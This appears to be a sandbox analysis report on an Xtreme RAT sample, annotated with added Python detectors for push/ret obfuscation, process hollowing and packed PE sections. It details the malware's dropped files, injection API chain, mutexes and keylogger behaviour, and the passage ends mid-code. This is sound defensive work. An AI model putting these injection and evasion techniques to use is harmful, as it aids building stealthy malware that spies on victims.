Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user~1\AppData\Local\Temp\server.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\InstallDir\Server.exe | File created: C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\InstallDir\Server.exeJump to dropped file
Creates license or readme fileShow sources
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function:
    3_2_00C82D48 push 00C82D74h; ret 3_2_00C82D6C
    3_2_00C82D46 push 00C82D74h; ret 3_2_00C82D6C
    3_2_00C83420 push 00C8349Fh; ret 3_2_00C83497
    3_2_00C879DC push 00C87A65h; ret 3_2_00C87A5D
    3_2_00C82924 push 00C82950h; ret 3_2_00C82948
    3_2_00C880DC push 00C88108h; ret 3_2_00C88100
    3_2_00C82548 push 00C82580h; ret 3_2_00C82578
    3_2_00C88898 push 00C888C4h; ret 3_2_00C888BC
    3_2_00C83F94 push 00C83FC0h; ret 3_2_00C83FB8
    3_2_00C8258C push 00C825B8h; ret 3_2_00C825B0
    3_2_00C823A4 push 00C823DEh; ret 3_2_00C823D6
    3_2_00C879DA push 00C87A65h; ret 3_2_00C87A5D
    3_2_00C848DC push 00C84908h; ret 3_2_00C84900
    3_2_00C87DD0 push 00C87E13h; ret 3_2_00C87E0B
    3_2_00C84578 push 00C845DCh; ret 3_2_00C845D4
    3_2_00C82AD8 push 00C82B04h; ret 3_2_00C82AFC
    3_2_00C8295C push 00C82988h; ret 3_2_00C82980
    3_2_00C879A0 push 00C879D8h; ret 3_2_00C879D0
    3_2_00C8503C push 00C85068h; ret 3_2_00C85060
    3_2_00C84034 push 00C84060h; ret 3_2_00C84058
    3_2_00C89AA8 push 00C89AECh; ret 3_2_00C89AE4
    3_2_00C83C88 push 00C83CC0h; ret 3_2_00C83CB8
    3_1_00C82D48 push 00C82D74h; ret 3_1_00C82D6C
    3_1_00C82D46 push 00C82D74h; ret 3_1_00C82D6C
    3_1_00C83420 push 00C8349Fh; ret 3_1_00C83497
    3_1_00C879DC push 00C87A65h; ret 3_1_00C87A5D
    3_1_00C82924 push 00C82950h; ret 3_1_00C82948
    3_1_00C880DC push 00C88108h; ret 3_1_00C88100
    3_1_00C82548 push 00C82580h; ret 3_1_00C82578
    3_1_00C88898 push 00C888C4h; ret 3_1_00C888BC
    3_1_00C83F94 push 00C83FC0h; ret 3_1_00C83FB8
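The push/ret pairs above are a call-free control transfer: `push <imm32>` puts a code address on the stack and the following `ret` pops it into EIP, so a disassembler that only follows calls and jumps sees no branch. The Python below is an added example and not part of the Joe Sandbox report. It scans a raw code buffer for that pattern and flags a hit when the pushed immediate lands a few bytes past the `ret`; every entry in the list pushes an address eight bytes beyond its trailing identifier, which this example assumes is the address of the matching `ret`. The byte buffer is constructed to reproduce the first listed entry at base 0x00C82D48, the 64-byte gap and 32-byte reach limits are the example's own heuristics, and a byte-level scan without a disassembler can misfire on 0x68 bytes embedded in other instructions, so treat hits as candidates to confirm in a disassembler.

```python
import struct
from dataclasses import dataclass
from typing import List

PUSH_IMM32 = 0x68   # push imm32
RET = 0xC3          # ret
RET_IMM16 = 0xC2    # ret imm16


@dataclass(frozen=True)
class PushRetHit:
    push_va: int    # address of the push instruction
    ret_va: int     # address of the ret that consumes the pushed value
    target_va: int  # where execution continues after the ret


def find_push_ret(code: bytes, base_va: int, max_gap: int = 64, max_reach: int = 32) -> List[PushRetHit]:
    """Byte-level scan for 'push imm32 ... ret' where imm32 is a code address
    just past the ret. max_gap bounds the push-to-ret distance and max_reach
    bounds how far past the ret the target may lie (both assumed heuristics)."""
    hits = []
    for i in range(len(code) - 4):
        if code[i] != PUSH_IMM32:
            continue
        imm = struct.unpack_from("<I", code, i + 1)[0]
        if not (base_va <= imm < base_va + len(code)):
            continue  # pushed value is not an address inside this buffer
        # take the first ret inside the window after the push
        for j in range(i + 5, min(len(code), i + 5 + max_gap)):
            if code[j] in (RET, RET_IMM16):
                ret_va = base_va + j
                if ret_va < imm <= ret_va + max_reach:
                    hits.append(PushRetHit(base_va + i, ret_va, imm))
                break
    return hits


def describe(hit: PushRetHit) -> str:
    """Render a hit in the same shape as the sandbox signature lines."""
    return f"{hit.push_va:08X} push {hit.target_va:08X}h; ret {hit.ret_va:08X}"


# Constructed code buffer (not bytes from the sample) laid out to mirror the
# first reported entry: push at 00C82D48, ret at 00C82D6C, target 00C82D74.
BASE_VA = 0x00C82D48
SAMPLE_CODE = (
    b"\x68" + struct.pack("<I", 0x00C82D74)   # 00C82D48: push 00C82D74h
    + b"\x90" * 31                            # filler up to the ret
    + b"\xC3"                                 # 00C82D6C: ret -> continues at 00C82D74
    + b"\x90" * 7                             # never executed
    + b"\x55\x8B\xEC"                         # 00C82D74: push ebp; mov ebp, esp
    + b"\xE8\x00\x00\x00\x00"                 # call $+5 (ordinary call, not flagged)
    + b"\xC3"                                 # ret
    + b"\x68\x00\x10\x00\x00\xC3"             # push 1000h; ret: immediate is not a code address here
)


if __name__ == "__main__":
    for h in find_push_ret(SAMPLE_CODE, BASE_VA):
        print(describe(h))
```

Run against a dumped section with its real base address (the report's 3_2_ functions live in the image mapped at 0x00C80000); the describe() output is then directly comparable with the signature lines.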
Sample is packed with UPX
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Spreading:

Enumerates the file system
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C835B0 FindFirstFileW,CloseHandle

System Summary:

Installs Xtreme RAT
Source: C:\Program Files\Internet Explorer\iexplore.exe | Window created: XtremeKeylogger
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread
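The call chain in function 00C84600 above is the process-hollowing (RunPE) recipe: create a process, read its thread context, unmap its image, allocate and write a replacement, point the thread at the new entry point, resume. The same function at the same address turning up in svchost.exe, iexplore.exe and C:\Windows\InstallDir\Server.exe is the injected image carrying its own loader. The Python below is an added example, not part of the report, showing how a consumer of an API trace (a sandbox or EDR call log) can match that ordered pattern per (caller, target) pair instead of alerting on any single API. The trace is constructed to follow the reported call order with placeholder pids, and the stage rules are the example's own.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ApiCall:
    pid: int                      # process making the call
    api: str                      # Win32/NT API name
    target: Optional[int] = None  # pid the call acts on (None for calls on the caller itself)


# Stages that carry the payload into the victim and start it (required, in this order)
CORE_ORDER = ("WriteProcessMemory", "SetThreadContext", "ResumeThread")
# Supporting stages that strengthen the verdict when present
SUPPORT = ("CreateProcessW", "GetThreadContext", "NtUnmapViewOfSection", "VirtualAllocEx", "VirtualProtectEx")
TRACKED = set(CORE_ORDER) | set(SUPPORT)


def detect_hollowing(trace: List[ApiCall]) -> List[Dict]:
    """Group cross-process calls by (caller, target) and report pairs whose
    stage sequence matches hollowing: memory written into the target, then its
    thread context replaced, then the thread resumed, with a VirtualAllocEx
    somewhere before the first write."""
    stages: Dict[tuple, List[str]] = defaultdict(list)
    for call in trace:
        if call.target is None or call.api not in TRACKED:
            continue
        key = (call.pid, call.target)
        if not stages[key] or stages[key][-1] != call.api:   # collapse repeated writes
            stages[key].append(call.api)

    findings = []
    for (pid, target), seq in stages.items():
        def first(api: str) -> int:
            return seq.index(api) if api in seq else -1
        write, ctx, resume = (first(a) for a in CORE_ORDER)
        if write < 0 or not (write < ctx < resume):
            continue
        alloc = first("VirtualAllocEx")
        if not (0 <= alloc < write):
            continue
        unmapped = "NtUnmapViewOfSection" in seq
        findings.append({
            "pid": pid,
            "target": target,
            "stages": seq,
            "unmapped_original_image": unmapped,
            "confidence": "high" if unmapped else "medium",
        })
    return findings


# Constructed trace (not sandbox output) following the call order the report
# lists for function 00C84600; the pids are placeholders.
SAMPLE_TRACE = [
    ApiCall(2084, "CreateProcessW", 2216),        # server.exe starts svchost.exe
    ApiCall(2084, "Sleep"),
    ApiCall(2084, "GetThreadContext", 2216),
    ApiCall(2084, "ReadProcessMemory", 2216),
    ApiCall(2084, "NtUnmapViewOfSection", 2216),  # evict the legitimate image
    ApiCall(2084, "VirtualAllocEx", 2216),
    ApiCall(2084, "WriteProcessMemory", 2216),
    ApiCall(2084, "WriteProcessMemory", 2216),
    ApiCall(2084, "VirtualProtectEx", 2216),
    ApiCall(2084, "WriteProcessMemory", 2216),
    ApiCall(2084, "SetThreadContext", 2216),      # entry point now inside the payload
    ApiCall(2084, "ResumeThread", 2216),
    # benign comparison: a launcher that inspects and resumes a child without writing into it
    ApiCall(3100, "CreateProcessW", 3120),
    ApiCall(3100, "GetThreadContext", 3120),
    ApiCall(3100, "ResumeThread", 3120),
]

if __name__ == "__main__":
    for finding in detect_hollowing(SAMPLE_TRACE):
        print(finding)
```

NtUnmapViewOfSection is treated as supporting rather than required because some loaders overwrite the original image in place; the write, context swap and resume ordering is what separates hollowing from a debugger or a launcher that merely reads context and resumes.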
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\server.exe | File created: C:\Windows\InstallDir\
Creates mutexes
Source: C:\Windows\InstallDir\Server.exe | Mutant created: \Sessions\1\BaseNamedObjects\XTREMEUPDATE
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaPERSIST
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKaEXIT
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Mutant created: \Sessions\1\BaseNamedObjects\C7379241760F18F4D05EC3BE
Source: C:\Windows\InstallDir\Server.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSma9HnKa
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8939E, 3_2_00C88EF8, 3_2_00C8941B, 3_1_00C8939E, 3_1_00C88EF8, 3_1_00C8941B
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C88ECC, 5_2_00C8939E, 5_2_00C8941B, 5_2_00C88EC4
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C8939E, 6_2_00C8941B, 6_2_00C88ECC, 6_2_00C88EC4
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00485828, 12_2_00482ECC, 12_2_00455A30, 12_2_0046816C, 12_2_00478D98, 12_2_0046DDC8, 12_2_0047A380, 12_2_0043957C, 12_2_00402180
Source: C:\Windows\explorer.exe | Code function: 14_1_01B8939E, 14_1_01B8941B, 14_1_01B88EF8
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C8939E, 15_2_00C8941B, 15_2_00C88ECC, 15_2_00C88EC4, 15_1_00C8939E, 15_1_00C8941B, 15_1_00C88ECC, 15_1_00C88EC4
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | String function: 00404D88 appears 80 times; 00406E2C appears 63 times
Source: C:\Users\user\AppData\Local\Temp\server.exe | String function: 00C854EC appears 178 times; 00C82F90 appears 56 times; 00C81F1C appears 180 times; 00C82744 appears 32 times; 00C81BB4 appears 354 times; 00C833A8 appears 80 times; 00C888D0 appears 62 times; 00C826F4 appears 40 times
Source: C:\Program Files\Internet Explorer\iexplore.exe | String function: 00C854EC appears 89 times; 00C81F1C appears 90 times; 00C81BB4 appears 177 times; 00C833A8 appears 47 times; 00C888D0 appears 41 times
Source: C:\Windows\InstallDir\Server.exe | String function: 00C854EC appears 178 times; 00C82F90 appears 52 times; 00C81F1C appears 180 times; 00C82744 appears 42 times; 00C81BB4 appears 354 times; 00C833A8 appears 70 times; 00C888D0 appears 82 times; 00C826F4 appears 40 times
Source: C:\Windows\explorer.exe | String function: 01B81BB4 appears 87 times
Source: C:\Windows\System32\svchost.exe | String function: 00C854EC appears 89 times; 00C81F1C appears 90 times; 00C81BB4 appears 177 times; 00C833A8 appears 46 times; 00C888D0 appears 41 times
PE file contains executable resources (Code or Archives)
Source: 358saxio.exe.3.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.12.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: 358saxio.exe.27.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
Source: Skype.exe.35.dr | Static PE information: Resource name: RT_GROUP_CURSOR type: International EBCDIC text, with no line terminators, with escape sequences
PE file contains strange resources
Source: sxz.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.12.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 358saxio.exe.27.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Skype.exe.35.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 3 times)
Sample file is different than original file name gathered from version info
Source: sxz.exe, 00000001.00000002.14995935256.002F0000.00000008.sdmp | Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs sxz.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\sxz.exe | File read: C:\Users\user\Desktop\sxz.exe
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\43.0.1 (x86 en-US)\Main Install Directory
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: server.exe.2.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999469521605
Source: Server.exe.3.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999469521605
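Both the UPX0/UPX1 section names reported under Data Obfuscation and the .rsrc "ZLIB complexity" of 0.9995 for server.exe and Server.exe are static checks that can be reproduced without running the sample. The Python below is an added example, not Joe Sandbox code: it walks the PE section table by hand, flags UPX section names, and computes the zlib compressed/raw ratio per section, which this example assumes is what the report's "ZLIB complexity" measures (on that reading the signature's "compression ratio < 0.011" is the complementary space saving, 1 minus 0.9995). The image it analyses is constructed inside the script, and the 0.95 threshold is an assumption. A ratio near 1.0 on .rsrc is consistent with the "load and extract PE file embedded resources" functionality reported for server.exe: the resource is an embedded payload, not icons or dialogs.

```python
import hashlib
import struct
import zlib
from typing import Dict, List, Tuple

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
# Assumption: a compressed/raw ratio this close to 1.0 means the bytes are
# already compressed or encrypted, i.e. a packed or embedded payload.
PACKED_THRESHOLD = 0.95


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size; 0.0 for an empty section."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_sections(pe: bytes) -> List[Tuple[str, bytes]]:
    """Walk the PE section table by hand and return (name, raw bytes) pairs."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
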